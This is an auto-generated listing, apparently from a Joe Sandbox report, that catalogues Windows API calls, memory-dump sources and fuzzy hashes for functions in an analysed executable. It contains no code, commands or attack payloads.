• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
• Opcode ID: b026acef8671d1df709cfa806b650792ae2e046e804c09d94062b658e518d371
• Instruction ID: 94a1944dffa6109d42dc3de63112744f2953ee0d392d00ba095986d71f5289f7
• Opcode Fuzzy Hash: b026acef8671d1df709cfa806b650792ae2e046e804c09d94062b658e518d371
• Instruction Fuzzy Hash: 8ED0A734414322EFD7316FA0F80D62236D4AB14300B10841AE69AD1654D770C4D0CA10
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0018E69C,?,0018E43F), ref: 0018E6B4
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0018E6C6
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: d233b10d97576deb17f57fcf93a12929facdf7cae10e05a7a9b48f16b741d79e
• Instruction ID: 5a331769fd7e93acbc02b9964e5b50a915f567352fd8d76390c3d0b1dcc70f0a
• Opcode Fuzzy Hash: d233b10d97576deb17f57fcf93a12929facdf7cae10e05a7a9b48f16b741d79e
• Instruction Fuzzy Hash: 1CD0A934818322EFD7306FB0F80867236E8AB24301F21542AE496E2660EBB0D8E0DB10
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0018E6D9,0000000C,0018E55B,0020DC28,?,?), ref: 0018E6F1
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0018E703
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsWow64Process$kernel32.dll
• API String ID: 2574300362-3024904723
• Opcode ID: 42e1237068e74a2143ed2f6bbca7da8466977cff144f20c199181e0fe08d68aa
• Instruction ID: 113ec30b20203b1270cd32eb9bca9bf77a8fd395a00608fcaec89a2dc6e7f91f
• Opcode Fuzzy Hash: 42e1237068e74a2143ed2f6bbca7da8466977cff144f20c199181e0fe08d68aa
• Instruction Fuzzy Hash: 82D05238814322FAD7203BA0B8486233FE8AB05300B01442AE496A2660DBB0D880CB91
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,001CEBAF,?,001CEAAC), ref: 001CEBC7
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001CEBD9
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                              • Opcode ID: c2fae5d349d262a6f5efbc0eed307bc161922238abad60ca7ecf9e0e2873571e
                                                                                                                              • Instruction ID: d983601b4b4b53704ac81613e5f6034c80e767946f83dde6f14262cbf3e66530
                                                                                                                              • Opcode Fuzzy Hash: c2fae5d349d262a6f5efbc0eed307bc161922238abad60ca7ecf9e0e2873571e
                                                                                                                              • Instruction Fuzzy Hash: 1FD05E34418722ABD7202F70B848B2136D4AB14304B11841DE45692550DB70DC80C610
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,001B135F,?,001B1440), ref: 001B1389
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 001B139B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                              • API String ID: 2574300362-1071820185
                                                                                                                              • Opcode ID: d80817fea8e266f33b10bd8267525c4ed6f205947799557e56668be245a97585
                                                                                                                              • Instruction ID: c02a7ec54b5a5949e8809870c2f0712902f96f05e5b3eaa6dc7a64cb706c6907
                                                                                                                              • Opcode Fuzzy Hash: d80817fea8e266f33b10bd8267525c4ed6f205947799557e56668be245a97585
                                                                                                                              • Instruction Fuzzy Hash: 51D0A731C24322BFD7204F64F8087A536D4FF04314F054419E486D1960E7B4C5D0D720
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,001B1371,?,001B1519), ref: 001B13B4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 001B13C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                              • API String ID: 2574300362-1587604923
                                                                                                                              • Opcode ID: cd200e7befc835f529ae5ba7692864dd5982a24be35a219e423f268deabf7a8a
                                                                                                                              • Instruction ID: 13eba079aefb3084b04dbfad00ff4a6d1faf703cd1d0b068e457e6c2c897a6ac
                                                                                                                              • Opcode Fuzzy Hash: cd200e7befc835f529ae5ba7692864dd5982a24be35a219e423f268deabf7a8a
                                                                                                                              • Instruction Fuzzy Hash: 5ED0A730414322BFD7204F65F80866136E9BB40314F014419E456D1970EBB4C4C0C710
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,001D3AC2,?,001D29F5), ref: 001D3ADA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001D3AEC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                              • Opcode ID: 6fceea1b098f53834e4b25a031436e393b15bacac269c13b683de84caccbe422
                                                                                                                              • Instruction ID: 744c8e75c00b31561669cefa6b9152c702b8343b5be2f8ea06a55d2297121ac2
                                                                                                                              • Opcode Fuzzy Hash: 6fceea1b098f53834e4b25a031436e393b15bacac269c13b683de84caccbe422
                                                                                                                              • Instruction Fuzzy Hash: AFD0A7315183239FD7205F60F80D66177D8AB12304B00442AF4E6D2A90EFF0C4C0C611
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,001C6AA6), ref: 0017AB2D
                                                                                                                              • _wcscmp.LIBCMT ref: 0017AB49
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper_wcscmp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 820872866-0
                                                                                                                              • Opcode ID: b4348f27793f92a6d401134d7772359d91305475e8952aff5ce80caea9d506b1
                                                                                                                              • Instruction ID: 489edb44472f102b04cad050431f11e8afeb92ab481c1a331d786d22aa3aa1a1
                                                                                                                              • Opcode Fuzzy Hash: b4348f27793f92a6d401134d7772359d91305475e8952aff5ce80caea9d506b1
                                                                                                                              • Instruction Fuzzy Hash: CCA10571B00106EBDB19DF65E9856BDB7B1FF84300FA58169EC5AC3290DB319871C782
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 001D0D85
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 001D0DC8
                                                                                                                                • Part of subcall function 001D0458: CharLowerBuffW.USER32(?,?,?,?), ref: 001D0478
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001D0FB2
                                                                                                                              • _memmove.LIBCMT ref: 001D0FC2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3659485706-0
                                                                                                                              • Opcode ID: ece211aa21c74882f169e460d25f6e0cb1c2f0af71628af2ca133b41d495e071
                                                                                                                              • Instruction ID: ee9acce06903daa6c93fa831796a745816e4f629d530eee168e240339f48abec
                                                                                                                              • Opcode Fuzzy Hash: ece211aa21c74882f169e460d25f6e0cb1c2f0af71628af2ca133b41d495e071
                                                                                                                              • Instruction Fuzzy Hash: C8B18F716043009FC705DF28C480A6AB7F5EF99714F14896EF8899B352DB71EE46CB92
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001CAF56
                                                                                                                              • CoUninitialize.COMBASE ref: 001CAF61
                                                                                                                                • Part of subcall function 001B1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001B10B8
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CAF6C
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001CB23F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 780911581-0
                                                                                                                              • Opcode ID: 0f9ac94c77e1329dffd474ff66cfdacfc6fb6acd334838f66bc4a78961b89795
                                                                                                                              • Instruction ID: 459aa00899442a4ad5b9cfc53d0206aaf23a012624794d6addae710ec3a31be2
                                                                                                                              • Opcode Fuzzy Hash: 0f9ac94c77e1329dffd474ff66cfdacfc6fb6acd334838f66bc4a78961b89795
                                                                                                                              • Instruction Fuzzy Hash: 6FA11575604601AFCB10DF14C896F6AB7E4BFA8360F05845DF99A9B3A1CB70ED40CB82
                                                                                                                              APIs
                                                                                                                              • _memmove.LIBCMT ref: 0017C419
                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,001B6653,?,?,00000000), ref: 0017C495
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1325644223-0
                                                                                                                              • Opcode ID: 98303a31ef4dc99061717077b7c7f3a828518ad0c24989c22a41981c0178ef61
                                                                                                                              • Instruction ID: 209b3595941810f62e620751c93d2f48982ea6105848c4f4df99e4020dd19074
                                                                                                                              • Opcode Fuzzy Hash: 98303a31ef4dc99061717077b7c7f3a828518ad0c24989c22a41981c0178ef61
                                                                                                                              • Instruction Fuzzy Hash: BAA1CE30A04609EBDB14CF65D894BBDFBB0FF05300F14C199E86A9B285D735E961DB91
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3877424927-0
                                                                                                                              • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                              • Instruction ID: b746b136fe2457f92edf2387c35b73f4b6868d4782dd61782e6db5a4c1d61e81
                                                                                                                              • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                              • Instruction Fuzzy Hash: 3851AE30A00316EBDF288FB98880AAE77B5BF50324F248729F865972D0D7709E529B40
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001DC354
                                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 001DC384
                                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 001DC3EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3880355969-0
                                                                                                                              • Opcode ID: d81f997599f44a86184c9735468904f0d4c7aaab8b72012ec9af62b72fdf72b9
                                                                                                                              • Instruction ID: cc7d8a2dd3614ea9b0193af79adaaec37e5a6213e7cba3a195ed71fc06128f08
                                                                                                                              • Opcode Fuzzy Hash: d81f997599f44a86184c9735468904f0d4c7aaab8b72012ec9af62b72fdf72b9
                                                                                                                              • Instruction Fuzzy Hash: 2F514C71A00206EFDF10DF68D884AAE7BB6BB55360F20895AF9159B291D770ED41CB90
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 001AD258
                                                                                                                              • __itow.LIBCMT ref: 001AD292
                                                                                                                                • Part of subcall function 001AD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 001AD549
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 001AD2FB
                                                                                                                              • __itow.LIBCMT ref: 001AD350
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3379773720-0
                                                                                                                              • Opcode ID: d138f2f6074f04fe6809944a6c3832969ef94793855d3c3234e19f68746d188d
                                                                                                                              • Instruction ID: 715e481343ba77c8a616a0bc5c9886e3d800745bed898ed3b517e0835d5a4f33
                                                                                                                              • Opcode Fuzzy Hash: d138f2f6074f04fe6809944a6c3832969ef94793855d3c3234e19f68746d188d
                                                                                                                              • Instruction Fuzzy Hash: A541C875A00709AFDF15DF94DC42FEE7BB9AF59710F004029FA06A7281DB709A45CB62
                                                                                                                              APIs
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001BEF32
                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 001BEF58
                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001BEF7D
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001BEFA9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3321077145-0
                                                                                                                              • Opcode ID: ba8508d981fda5a5069f99a619cdc77599d16c00e06dcdb31fe8c44db36373c6
                                                                                                                              • Instruction ID: d6f0b71a47843e71ce866277e562240f9e0d5d7df791905ea90d2071daf42798
                                                                                                                              • Opcode Fuzzy Hash: ba8508d981fda5a5069f99a619cdc77599d16c00e06dcdb31fe8c44db36373c6
                                                                                                                              • Instruction Fuzzy Hash: 4B414C39600611DFCB11EF15C548A99BBF5EF99320B19C098E84AAF762CB70FD40DB91
                                                                                                                              APIs
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001DB3E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 634782764-0
                                                                                                                              • Opcode ID: b53e6a738da46848452b9a777e4cf99b10d65eded4588490d98fe74d607b04c1
                                                                                                                              • Instruction ID: 6198ad33cf680c13aade5725585d036f9c4ba0ddca3821a0ff726a6ec0170650
                                                                                                                              • Opcode Fuzzy Hash: b53e6a738da46848452b9a777e4cf99b10d65eded4588490d98fe74d607b04c1
                                                                                                                              • Instruction Fuzzy Hash: 6F317A34608204FBEF24DE5898D9BAC37A5AB05360F668513FA53D67A2C730E950EB61
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DD617
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001DD68D
                                                                                                                              • PtInRect.USER32(?,?,001DEB2C), ref: 001DD69D
                                                                                                                              • MessageBeep.USER32(00000000), ref: 001DD70E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1352109105-0
                                                                                                                              • Opcode ID: a94b9202cf209d2b07921a564f240cc8dd4b4224c2015e89985a9edd10cb9699
                                                                                                                              • Instruction ID: 2f82ec248d942800fb106e45e2725c5cf21469dc3f47fc8db78911147082a74f
                                                                                                                              • Opcode Fuzzy Hash: a94b9202cf209d2b07921a564f240cc8dd4b4224c2015e89985a9edd10cb9699
                                                                                                                              • Instruction Fuzzy Hash: E8416934A00118DFDB11CF68F884BA97BF6BF49314F1981AAE4199B3A5D730E881CB90
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 001B44EE
                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 001B450A
                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 001B456A
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 001B45C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: 955b5a36e455672335eb32a05d67dfbcc111e667608c3980e146294a6dab6353
                                                                                                                              • Instruction ID: 84f21775316f90ac8982c6554a5d164299a8fea0fedbf4f1db8caf0340a13f30
                                                                                                                              • Opcode Fuzzy Hash: 955b5a36e455672335eb32a05d67dfbcc111e667608c3980e146294a6dab6353
                                                                                                                              • Instruction Fuzzy Hash: EB315AB19046586FEF348B64D8087FE7BB59B55310F04821AF0C2932D3C7748E85D762
                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001A4DE8
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 001A4E16
